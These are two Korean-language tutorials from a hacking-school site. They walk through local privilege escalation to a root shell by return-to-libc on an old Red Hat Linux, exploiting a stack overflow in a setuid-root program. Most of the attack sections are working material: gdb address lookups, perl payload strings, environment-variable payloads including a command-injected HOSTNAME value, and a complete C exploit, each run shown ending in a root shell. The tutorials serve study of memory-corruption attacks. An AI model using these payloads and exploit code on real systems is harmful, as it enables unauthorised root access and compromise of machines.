┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓ 
┃┃  ┃┃    ┃    ━┫    ━┫      ┃  ┃  ┃  ┃  ┃    ━╋┓ 
┃      ┃    ┃      ┃      ┃  ┏━┫      ┃      ┃      ┃┃ 
┃      ┃    ┣━    ┃    ━┫      ┃      ┣┓  ┏╋━    ┃┃ 
┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃ 
┃Since 2002.  W / I / S / E / G / U / Y / S  in HackerSchool ┃┃ 
┃http://research.hackerschool.org                            ┃┃ 
┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ 
  ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ 
     

━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 
:: Title  :: 오메가를 이용한 루트쉘 획득(1)
:: Date   :: 2004. 5. 22.
:: Author :: naska21
:: Contact:: E-Mail(naska21@hanmail.net) 
             Homepage(http://naska.hackerschool.org)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 



━[Index] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

0x00. 잡담
0x01. 준비
0x02. 공격
0x03. 마치면서

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 
 

━[0x00. 잡담 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 얼마전 아는 분이 작성하고 계시는 RTL관련 문서를 홈페이지에 올려놓은 걸 보았습니다. 문서
는, 루트쉘을 획득하기 위해 막 삽질을 시작하는 시점이었습니다. 그래서 저두 한번 삽질을 해
보았고, 루트쉘을 획득하는데 성공했습니다. 오늘 다시 가서 보니 문서가 업데이트 되어 있었
는데요 저랑은 다른 방법으로 루트쉘을 획득하셨더군요. 원래는 삽질에 성공하면 자료를 정리
해서 그 분께 드리기로 되어 있었는데 제 방법이 더 복잡한지라 그냥 개인적으로 정리만 하기
로 했습니다. 아래 부터는 설명을 간략하기 위해 존칭은 생략하였습니다. '오메가'는 이하 OMG

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 


━[0x01. 준비 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 요즘 대부분의 리눅스 환경에서는 system() 라이브러리 함수를 이용해 루트쉘을 얻기위해서는
setuid()의 호출이 필요하다. 그런데 루트의 uid가 0이기 때문에 OMG을 이용해서 루트쉘을 얻
기 위해서는 인자 0x00000000을 어떻게 우리가 원하는 곳에 넣어주느냐 하는 어려움이 있다. 
공부를 조금 하신 분이시라면 어느 홈페이지 강좌에서 스택공간에 존재하는 0x00000000을 이용
해 이 문제를 해결하는 방법이 있다는 것을 아실 것입니다. 하지만 이 방법 또한 링크를 걸어
야 하는 작업이 필요해 깔끔한 느낌은 들지 않는다. 하지만, 이 방법을 이용하면서 링크를 걸
지 않아도 되는 0x00000000이 있는 부분을 찾게 되었다. 이것에 대한 것은 다음 번에 나올 문
서에서 언급하도록 할 것이다.

 이제 필자가 삽질한 방법을 알아보겠다. 여기에서 가정하고 있는 환경에는  몇가지 제약 사항
이 존재하는데.. 우선 랜덤 스택이다. 그리고 스택에는 실행 권한이 없다. 쉘코드를 사용할 수
없다는 것이다.

 랜덤 스택의 영향을 받지 않고 OMG을 이용해 루트쉘을 획득해 보도록 하겠다.
 여기서는 우선 환경 변수를 이용할 것이다. 환경변수의 주소는 정확한 계산이 가능하기 때문
이다. 취약한 프로그램이 환경변수를 다 지워버리면 어떻게 하는가? 그것에 대한 해결책은 한
번 스스로 찾아 보기 바란다. ^^;

 이제 어떻게 공격코드를 구성할 것인지 알아보겠다. 원하는 주소에 NULL 값을 넣기 위해
printf()와 "%n" 포멧 스트링을 사용할 것이다. 물론 bzero()를 이용하는 방법도 가능하다.
확인은 각자가 직접 해보기 바란다. 하지만 더 복잡하다는 것을 알아두라 ^^;

 printf("%n")을 수행하면 다음에 오는 인자로 주소값을 받아서 해당 주소값에 0x00000000을 
넣어주게 된다. 출력한 문자의 갯수가 0이기 때문..

 그리고 랜덤 스택 환경과 위에서 언급한 경우(쉘이 수행되지 않는 경우:같은 곳에 system()대
신 printf()의 주소를 넣어보면 잘 수행됨, 하지만 쉘은 수행되지 않음, 이유는 아직 모름)에
대응하기 위해 strcpy()를 사용할 것이다. 그리고 이러한 공격이 가능하도록 fake ebp기법을
사용할 것이다.

 공격문자열을 하나하나 구성해 보자면.. 우선, 쉘을 수행하는 문자열이 필요하다
 각 블럭마다 4byte 주소값이 들어간다. ('*'는 포인터를 뜻함. 즉, 가리키는 주소)
 
 
 [ *system ][ ret ][ *"/bin/sh" ]
 
 
 여기서 현재 [ret]에는 어떤 문자열이 들어가도 상관없다. 쉘만 수행되면 되기 때문이다.
 우리는 루트쉘을 획득해야 하므로 system()이 수행되기 전에 setuid(0)이 호출되어야 한다.
 
 
 [ *setuid ][ *system ][ 0x00000000 ][ *"/bin/sh" ]
 
 
 위와 같이 되어야 하겠다.. 하지만, 널 문자를 직접 입력해 줄 수 없기 때문에 널대신 쓰레기
를 넣어주어야 한다. 변경후 아래와 같다..
 

 [ *setuid ][ *system ][ 0xAAAAAAAA ][ *"/bin/sh" ]
 
 
 다음은 0xAAAAAAAA 부분에 NULL 값을 넣어주기 위해 printf("%n")을 적용한 경우이다.
 여기서부터가 중요한데.. fake ebp를 사용해야 한다.
 
 
    ┏━━━━━━━━━━━━━━━━┓
    ┃                                ▼ 
 [ sfp ][ *printf ][ *leave ][ *"%n" ][ *0xAAAAAAAA ][ *setuid ][ *system ]=
        ┏━━━━━━━━━━━┃━━━━━━┛
        ▼                      ▼
 =[ 0xAAAAAAAA ][ *"/bin/sh" ][ "%n"(2byte) ]
 
 
 이 공격코드를 그대로 적용해도 되지만, 문제는 랜덤스택 환경에서는 이 공격코드가 존재하는
주소를 정확히 알 수가 없다는 것이다. 때문에 정확한 주소 계산이 가능한 환경변수에 이 공격
코드를 저장한 후 fake ebp를 이용하여 esp를 해당 주소로 이동시키면 되겠지만, 필자가 테스
트한 환경에서는 이런 방법으로 printf등의 함수는 수행되었지만 system을 이용한 쉘 획득에는
실패하였다. 이유는 피자도 잘 모르겠다..-_-; 하지만 삽질 결과 특이한 현상을 발견했다.
OMG을 이용해 system("/bin/sh")만 수행하는데도 sfp값에 따라서 수행될때도 있고 수행되지 않
을때도 있었다. 아직 이유는 모르겠다. -_-;;;;

 아무튼 이러한 문제를 해결하기 위해 strcpy를 이용해서 환경변수 공간이 아닌 스택 공간으로
위 코드를 복사한 후에 그 곳으로 esp를 옮겨, 계속해서 리턴이 진행되도록 여기서도 fake ebp
를 사용했다. 즉.. 위 코드는 환경변수에 넣고, main의 ebp부터는 bof를 이용해 아래 코드를 
덮어 써야 한다.


 [ sfp ][ *strcpy ][ *leave ][ dest addr ][ env addr ]
 
 
 env addr은 앞에서 살펴본 쉘을 수행하는 코드가 들어있는 환경변수 주소이고, dest addr과 
sfp는 같은 값이 되어야 한다. 이유는 strcpy에 의해 dest addr로 코드가 복사된 후 바로 이
dest addr로 esp가 이동되고 ret 명령이 수행되어야 하기 때문..  

 이제 대략적인 개요는 끝났으니, 실전으로 들어가 보도록 하자.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x02. 공격 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 


 취약한 소스는 아래와 같다.
 
 
[naska21@naska21 test]$ cat vul01.c
#include <stdio.h>

int main(int argc, char **argv)
{
        char str[7];

        strcpy(str, argv[1]);
        return 0;
}
[naska21@naska21 test]$ _


 컴파일 후 수행시켜 보면,


[naska21@naska21 test]$ ./vul01 `perl -e 'print "A"x28'`  
Segmentation fault
[naska21@naska21 test]$ _


 위와 같이 28개 문자를 입력한 순간부터 세그먼테이션 오류가 발생하는 것을 확인할 수 있다.
 권한은 아래와 같다.
 

[naska21@naska21 test]$ ls -al vul01
-rwsr-xr-x    1 root     root        11354  5월 19 11:52 vul01


 이제 우리가 필요한 정보(주소)들을 모아 보자.
 
 
[naska21@naska21 test]$ gdb -q vul01
(gdb) b main
Breakpoint 1 at 0x804832e
(gdb) r
Starting program: /home/naska21/test/vul01 

Breakpoint 1, 0x0804832e in main ()
(gdb) x/i printf
0x42052390 <printf>:    push   %ebp
(gdb) x/i system
0x42041e50 <system>:    push   %ebp
(gdb) x/i setuid
0x420aefe0 <setuid>:    push   %ebp
(gdb) x/i strcpy
0x42079da0 <strcpy>:    push   %ebp
(gdb) disas printf
Dump of assembler code for function printf:
0x42052390 <printf>:    push   %ebp
0x42052391 <printf+1>:  mov    %esp,%ebp
0x42052393 <printf+3>:  sub    $0x18,%esp
0x42052396 <printf+6>:  mov    %ebx,0xfffffffc(%ebp)
0x42052399 <printf+9>:  lea    0xc(%ebp),%ecx
0x4205239c <printf+12>: call   0x4201575d <__i686.get_pc_thunk.bx>
0x420523a1 <printf+17>: add    $0xd7f2f,%ebx
0x420523a7 <printf+23>: mov    0x17c(%ebx),%eax
0x420523ad <printf+29>: mov    (%eax),%eax
0x420523af <printf+31>: mov    %ecx,0x8(%esp,1)
0x420523b3 <printf+35>: mov    %eax,(%esp,1)
0x420523b6 <printf+38>: mov    0x8(%ebp),%eax
0x420523b9 <printf+41>: mov    %eax,0x4(%esp,1)
0x420523bd <printf+45>: call   0x42047f00 <vfprintf>
0x420523c2 <printf+50>: mov    0xfffffffc(%ebp),%ebx

*leave -> * 0x420523c5 <printf+53>: mov    %ebp,%esp
          * 0x420523c7 <printf+55>: pop    %ebp

0x420523c8 <printf+56>: ret    
0x420523c9 <printf+57>: nop    
0x420523ca <printf+58>: nop    
0x420523cb <printf+59>: nop    
0x420523cc <printf+60>: nop    
0x420523cd <printf+61>: nop    
0x420523ce <printf+62>: nop    
0x420523cf <printf+63>: nop    
End of assembler dump.
(gdb) 


 ※ 위 내용으로 아래와 같이 사용될 주소들을 알 수 있다..
 

printf : 0x42052390
system : 0x42041e50
setuid : 0x420aefe0
strcpy : 0x42079da0
leave  : 0x420523c5


 "/bin/sh" 문자열은 아래 프로그램을 컴파일 후 실행 시키면 얻을 수 있다.
 
 
[naska21@naska21 test]$ cat findstr.c
#include <stdio.h>

int main()
{
        char *ptr=0x42041e50; /* system 주소 */

        while(1)
        {
                if(*ptr == '/')
                        if(strcmp(ptr, "/bin/sh") == 0)
                                break;
                ptr++;
        }
        printf("%s : %p\n", ptr, ptr);
}
[naska21@naska21 test]$ ./findstr
/bin/sh : 0x42121466
[naska21@naska21 test]$ _


 그리고 복사할 대상 주소를 미리 정해놔야 한다..
 필자는 0xbffffa24 스택 공간에 환경변수에 저장한 코드를 복사할 것이다.
 그렇다면 아래와 같이 코드를 구성해서 환경변수에 저장해야 한다.


0xbffffa24
┃
▼
 [    sfp   ][  *printf ][  *leave  ][   *"%n " ][*0xAAAAAAAA][  *setuid ][ *system  ]=
 [0xbffffa34][0x42052390][0x420523c5][0xbffffa48][ 0xbffffa40][0x420aefe0][0x42041e50]=
 
 =[0xAAAAAAAA][*"/bin/sh"][ "%n"(2byte) ]
 =[0xAAAAAAAA][0x42121466][ "\x25\x62"  ]
 

 아래와 같이 환경변수로 저장한다.
 
  
[naska21@naska21 test]$ export EBP=`printf "\x34\xfa\xff\xbf\x90\x23\x05\x42\xc5\x23\x05
\x42\x48\xfa\xff\xbf\x40\xfa\xff\xbf\xe0\xef\x0a\x42\x50\x1e\x04\x42\xaa\xaa\xaa\xaa\x66
\x14\x12\x42\x25\x6e"`


 EBP의 주소는 아래와 같이 확인할 수 있다.
 
 
[naska21@naska21 test]$ cat envprt.c
#include <stdio.h>

int main(int argc, char **argv)
{
        printf("%s env : %p\n", argv[1], getenv(argv[1]));
}
[naska21@naska21 test]$ ./envprt EBP
EBP env : 0xbfffff8a
[naska21@naska21 test]$ _


 환경변수는 실행환경에 따라 변하는데.. 별다른 조작이 없는한 실행 파일명에 의해 약간의 차
이가 생깁니다. 그 차이는, "./envprt" 실행 파일명 길이와의 차이x2 이므로 EBP 환경변수의 
정확한 주소는 취약한 파일명의 길이가 "./vul01"로 7글자 "./envprt"는 8글자, x2는 2byte, 
위 결과에서 나온 주소 0xbfffff8a + 2 = 0xbfffff8c가 된다. 


 ./vul01 실행 중 EBP 주소 : 0xbfffff8c
 
 
 그렇다면 왜 (파일명 길이 차이)x2 만큼의 주소차이가 생길까?
 아래 코드를 컴파일하고 실행시켜보면,
 

[naska21@naska21 test]$ cat test02.c
#include <stdio.h>

int main(int argc, char **argv)
{
        int i;
        char *ptr;

        ptr = (char*)getenv("HOME");

        for(; ptr <= (char*)0xbfffffff ; ptr++)
        {
                if(*ptr == '\x00')
                        printf("\n");
                printf("%c", *ptr);
        }

        printf("\n");
        return 0;
}
[naska21@naska21 test]$ ./test02
/home/naska21
LOGNAME=naska21
EBP=4?퓧#B?BH???욈?
BPBおおfB%n
LESSOPEN=|/usr/bin/lesspipe.sh %s
G_BROKEN_FILENAMES=1
_=./test02
./test02

[naska21@naska21 test]$ _


 위와 같은 결과를 얻을 수 있다. 보면 맨 마지막 환경변수("_=") 다음에 실행 파일명이 있다.
 그리고 마지막 환경변수의 내용 역시 똑같은 실행 파일명이다. 스택은 위에서 부터 아래로 자
라나기 때문에 상위 주소에 있는 스트링의 길이가 가까운 하위 주소 결정에 영향을 미치게 된
다. 때문에 우리가 지정한 환경변수보다 상위 주소에 실행파일명이 두번 저장되기 때문에, 실
제 프로그램이 실행중에 환경변수 주소의 차이가 (실행파일명 차이) x2가 되는 것이다.

 이제 직접 프로그램의 인자로 넘겨줄 코드를 작성해 보도록 하자. 화면이 많이 넘어 갔으므로
우리가 여기에서 필요한 값들을 다시 나열해 보겠다.


 strcpy : 0x42079da0
 leave  : 0x420523c5
 dest   : 0xbffffa24
 EBP env: 0xbfffff8c

 [    sfp   ][  *strcpy ][  *leave  ][ dest addr][ env addr ]
 [0xbffffa24][0x42079da0][0x420523c5][0xbffffa24][0xbfffff8c]


 이제 이 값들을 취약한 프로그램의 인자로 넘겨준다.
 
 
[naska21@naska21 test]$ ./vul01 `perl -e 'print "A"x24,"\x24\xfa\xff\xbf","\xc8\x23\x05
\x42","\x50\xc4\x07\x42","\xc5\x23\x05\x42","\x24\xfa\xff\xbf","\x8c\xff\xff\xbf","\x26"'`
sh-2.05b# id
uid=0(root) gid=503(naska21) groups=503(naska21)
sh-2.05b# exit
exit
Segmentation fault
[naska21@naska21 test]$ _


 성공했다!!
 (ps. 환경변수 주소 계산 방법이 의심이 가는 분은 테스트 환경에서 직접 계산하여 위 코드에
 서 strcpy의 주소 대신 printf의 주소를 입력하여 수행해 보기 바란다.)
 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x03. 마치면서 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 휴.. 힘들게 겨우 마쳤습니다.
 삽질 한 양은 정말 많은데.. 결과물은 항상 적군요 ^^;
 이번 문서는 새로운 방법을 서술한 것이 아니고, 기존의 있던 방법들을 이렇게도 응용할 수 
있다는 것을 직접 보인 것 뿐입니다. 한마디로 '뻘짓' 이라고 할 수도 있죠..ㅋㅋ
 하지만 이번 삽질을 통해 새롭게 알게 된 것들도 많으며, 새로이 생긴 의문들도 많습니다.
 게다가 문서를 정리하면서 깨닫는게 더 많은 것 같더군요..
 정말 중요한 건 이런 문서가 이 문서를 보는 이들에게 실패의 경험까지 모두 전달할 수가 없
다는 것입니다. 성공은 타인 경험을 통해 알 수 있지만, 실패는 직접 경험해봐야 알 수 있다고 
생각합니다...

 오늘의 MSN 대화명 : 삽질은 내 친구~ -ㅁ-
  
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓ 
┃┃  ┃┃    ┃    ━┫    ━┫      ┃  ┃  ┃  ┃  ┃    ━╋┓ 
┃      ┃    ┃      ┃      ┃  ┏━┫      ┃      ┃      ┃┃ 
┃      ┃    ┣━    ┃    ━┫      ┃      ┣┓  ┏╋━    ┃┃ 
┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃ 
┃Since 2002.  W / I / S / E / G / U / Y / S  in HackerSchool ┃┃ 
┃http://research.hackerschool.org                            ┃┃ 
┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ 
  ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ 
     

━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 
:: Title  :: 오메가를 이용한 루트쉘 획득(2)
:: Date   :: 2004. 5. 23.
:: Author :: naska21
:: Contact:: E-Mail(naska21@hanmail.net) 
             Homepage(http://naska.hackerschool.org)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 



━[Index] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

0x00. 잡담
0x01. 준비
0x02. 공격
0x03. make exploit
0x04. 마치면서

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 
 

━[0x00. 잡담 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 윽.. 피곤하네요. =_=; 할것은 많은데.. ;;
 이전 문서에서는 스택에 원래 존재하는 NULL을 이용하지 않고 setuid(0)을 수행해 루트쉘을
획득하는 과정을 살펴 보았습니다. 솔직히.. 복잡하죠.. -_-;
 이번 문서에서 main의 ret 이 후에 존재하는 NULL값을 가지고 루트쉘을 획득하는 것을 보이겠
습니다. 이러한 방법은 인터넷의 다른 문서에서도 다루고 있지만, 링크를 수행하죠. 이 문서에
서 보여드릴 방법에서는 링크가 필요없습니다. ^^;
 테스트 환경은 레드헷 9.0, 커널 버젼은 2.6.1 입니다.
 그럼 gogogo~ (이하 간략한 설명을 위해 존칭은 생략합니다.)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x01. 준비 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 여기서는 많은 준비는 필요치 않다. 간단히 main의 ret 이후에 존재하는 값들에 대해 알아 볼
것이다.

 아래 덤프를 살펴보자.
 

[naska21@naska21 test]$ gdb -q vul01
(gdb) b main
Breakpoint 1 at 0x804832e
(gdb) r
Starting program: /home/naska21/test/vul01 

Breakpoint 1, 0x0804832e in main ()
(gdb) x/64x $ebp
0xbffffac8:     0xbffffae8      0x420158d4      0x00000001      0xbffffb14
0xbffffad8:     0xbffffb1c      0x400124b8      0x00000001      0x08048278
0xbffffae8:     0x00000000      0x08048299      0x08048328      0x00000001
0xbffffaf8:     0xbffffb14      0x08048230      0x0804837c      0x4000a950
0xbffffb08:     0xbffffb0c      0x4001020c      0x00000001      0xbffffc19
0xbffffb18:     0x00000000      0xbffffc32      0xbffffc4b      0xbffffc5b
0xbffffb28:     0xbffffc66      0xbffffc74      0xbffffc84      0xbffffca5
0xbffffb38:     0xbffffcb8      0xbffffcc5      0xbffffe88      0xbffffef0
0xbffffb48:     0xbfffff0d      0xbfffff19      0xbfffff30      0xbfffff45
0xbffffb58:     0xbfffff56      0xbfffff69      0xbfffff71      0xbfffff81
0xbffffb68:     0xbfffffa3      0xbfffffce      0x00000000      0x00000020
0xbffffb78:     0xffffe400      0x00000021      0xffffe000      0x00000010
0xbffffb88:     0x0383fbff      0x00000006      0x00001000      0x00000011
0xbffffb98:     0x00000064      0x00000003      0x08048034      0x00000004
0xbffffba8:     0x00000020      0x00000005      0x00000006      0x00000007
0xbffffbb8:     0x40000000      0x00000008      0x00000000      0x00000009
(gdb)


 vul01은 앞 문서에서 살펴보았던 bof 취약점을 가지고 있는 프로그램이다.
 간단히 위의 내용들을 정리하자면,
 
 
1 [    sfp ][   ret  ][   argc ][ **argv ]
2 [  **env ][  ----  ][   argc ][   ---- ]
3 [   NULL ][  ----  ][  *main ][   argc ]
4 [ **argv ][  ----  ][   ---- ][   ---- ]
5 [   ---- ][  ----  ][   argc ][*argv[0]]
6 [   NULL ][ *env[0]][ *env[1]][ ...... ]
7 ........................................
 
 
 위와 같음을 확인할 수 있다. ( '----'는 여기서는 중요치 않은 값들.. )
 위에서 5~6번째 줄을 주목하라. 프로그램을 수행할 때 인자를 몇개를 넘겨 주느냐에 따라 이 
부분은 가변적이다. 예를 들어, 위의 경우는 인자가 없는 경우이고, 인자를 하나 주었다면 6번
째줄에서 NULL이 한블럭 뒤로 밀려날 것이다. *argv[n] 이 끝나는 지점에 NULL이 위치하기 때
문이다.

 여기서 주목해야 할 것은 6번째 줄의 NULL 다음에 첫번째 환경변수의 주소가 있다는 것이다.
 때문에 첫번째 환경변수의 값을 조작하고, 6번째 줄에 있는 NULL 바로 이전에 system의 주소
를 overwrite하면 쉘을 수행시킬 수 있다. 그리고 system의 주소를 overwrite한 지점 바로 이
전에 setuid의 주소를 overwrite하면 우리는 루트쉘을 획득할 수 있다. 이 때, 우리는 공격 문
자열을 argv[1]로 넘겨주므로 아규먼트의 갯수가 늘어나게 되어 6번째 줄의 NULL이 있는 곳과
main의 ret와의 거리가 4바이트 증가하게 된다. 공격 후 아래와 같이 되야 한다. 


    .... [ *argv[0] ][ *argv[1] ][  NULL  ][ *env[0] ] ...
=>  .... [ *setuid  ][ *system  ][  NULL  ][ *env[0] ] ...


 때문에 공격 문자열은 system의 주소까지만 입력해주면 된다. 그리고 단순히 저 위치까지 esp
를 증가시키기 위해 간단히 "ret" 명령어가 존재하는 주소만 넣어주면 해결된다.
 그렇다면 공격코드는 아래와 같이 될 것이다.

  
      main ret
 ... [  *ret  ] x 18 [ *setuid  ][ *system  ]


 이론적인 것은 여기까지 하고, 이제 실전에 적용해 보도록 하겠다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x02. 공격 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 아래와 같이 필요한 주소를 얻는다.


[naska21@naska21 test]$ gdb -q vul01
(gdb) b main
Breakpoint 1 at 0x804832e
(gdb) r
Starting program: /home/naska21/test/vul01 

Breakpoint 1, 0x0804832e in main ()
(gdb) x/i system
0x42041e50 <system>:    push   %ebp
(gdb) x/i setuid
0x420aefe0 <setuid>:    push   %ebp
(gdb) disas printf
Dump of assembler code for function printf:
0x42052390 <printf>:    push   %ebp
0x42052391 <printf+1>:  mov    %esp,%ebp
0x42052393 <printf+3>:  sub    $0x18,%esp
0x42052396 <printf+6>:  mov    %ebx,0xfffffffc(%ebp)
0x42052399 <printf+9>:  lea    0xc(%ebp),%ecx
0x4205239c <printf+12>: call   0x4201575d <__i686.get_pc_thunk.bx>
0x420523a1 <printf+17>: add    $0xd7f2f,%ebx
0x420523a7 <printf+23>: mov    0x17c(%ebx),%eax
0x420523ad <printf+29>: mov    (%eax),%eax
0x420523af <printf+31>: mov    %ecx,0x8(%esp,1)
0x420523b3 <printf+35>: mov    %eax,(%esp,1)
0x420523b6 <printf+38>: mov    0x8(%ebp),%eax
0x420523b9 <printf+41>: mov    %eax,0x4(%esp,1)
0x420523bd <printf+45>: call   0x42047f00 <vfprintf>
0x420523c2 <printf+50>: mov    0xfffffffc(%ebp),%ebx
0x420523c5 <printf+53>: mov    %ebp,%esp
0x420523c7 <printf+55>: pop    %ebp

*ret  -> 0x420523c8 <printf+56>: ret    

0x420523c9 <printf+57>: nop    
0x420523ca <printf+58>: nop    
0x420523cb <printf+59>: nop    
0x420523cc <printf+60>: nop    
0x420523cd <printf+61>: nop    
0x420523ce <printf+62>: nop    
0x420523cf <printf+63>: nop    
End of assembler dump.
(gdb) 


 필요한 주소는 아래와 같다.
 
 
system : 0x42041e50
setuid : 0x420aefe0
ret    : 0x420523c8


 공격하기 전에 첫번째 환경변수의 값을 바꿔야 한다.

 
[naska21@naska21 test]$ echo $HOSTNAME              
naska21
[naska21@naska21 test]$ 


 첫번째 환경변수는 "HOSTNAME" 이다. 앞서 살펴본 *env[0]에는 환경변수명을 포함한 환경변수
포인터 이므로 환경변수값 변경없이 system을 수행시키면 "HOSTNAME=naska21"을 실행시키게 되
는 것이다. 때문에 아래와 같이 HOSTNAME 환경변수를 변경해 준다.


[naska21@naska21 test]$ export HOSTNAME="naska21;/bin/sh"


 이제 취약한 프로그램을 공격해 보자.
  

[naska21@naska21 test]$ ./vul01 "`perl -e 'print "A"x28,"\xc8\x23\x05\x42"x18,"\xe0\xef
\x0a\x42","\x50\x1e\x04\x42"'`"
sh-2.05b# id
uid=0(root) gid=503(naska21) groups=503(naska21)
sh-2.05b# exit
exit
Segmentation fault
[naska21@naska21 test]$ _


 성공했다. ""로 묶어준 이유는 setuid주소에 "\x0a" 문자가 포함되어 그 뒤에 내용은 인자로 
전달되지 않기 때문에 모든 문자를 인자로 전달해 주기 위함이다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x03. make exploit ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 깔끔한 공격을 위한 exploit이다.
 

[naska21@naska21 test]$ cat ex01.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char arg[200];
char *argv[] = {"./vul01", arg, NULL};
char *envp[] = {"/bin/sh", NULL}; // 환경변수 하나만 원하는 문자열로 설정해주면 된다.

main()
{
        // dummy, ret, setuid, system 
        unsigned long libs[] = {0x41414141, 0x420523c8, 0x420aefe0, 0x42041e50};
        unsigned long *ptr;
        int i;

        ptr = (unsigned long *)arg;
        for(i = 0; i < 7; i++, ptr++) // dummy(28 byte)
        {
                *ptr = libs[0];
        }
        for(i = 0; i < 18; i++, ptr++) // retx18
        {
                *ptr = libs[1];
        }
        *ptr++ = libs[2]; // setuid
        *ptr++ = libs[3]; // system
        *ptr = (unsigned long)NULL;

        execve(argv[0], argv, envp); // attack~!!
}
[naska21@naska21 test]$ ./ex01
sh-2.05b# id
uid=0(root) gid=503(naska21) groups=503(naska21)
sh-2.05b# exit
exit
Segmentation fault
[naska21@naska21 test]$ _


 추가사항 : 이러한 exploit을 통한 attack의 경우에는 argv[0]을 "/bin/sh"로 하여 공격에
 성공할 수 있다. 직접 해보기 바란다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━[0x04. 참고문서 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 Omega PROJECT - lamagra
 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━[0x05. 마치면서 ] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 

 피곤하네요 =_=;; 시작부터 마칠때까지.. ㅎㅎ;
 이제 크랙에 대한 문서도 써보고 싶어라~~
 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━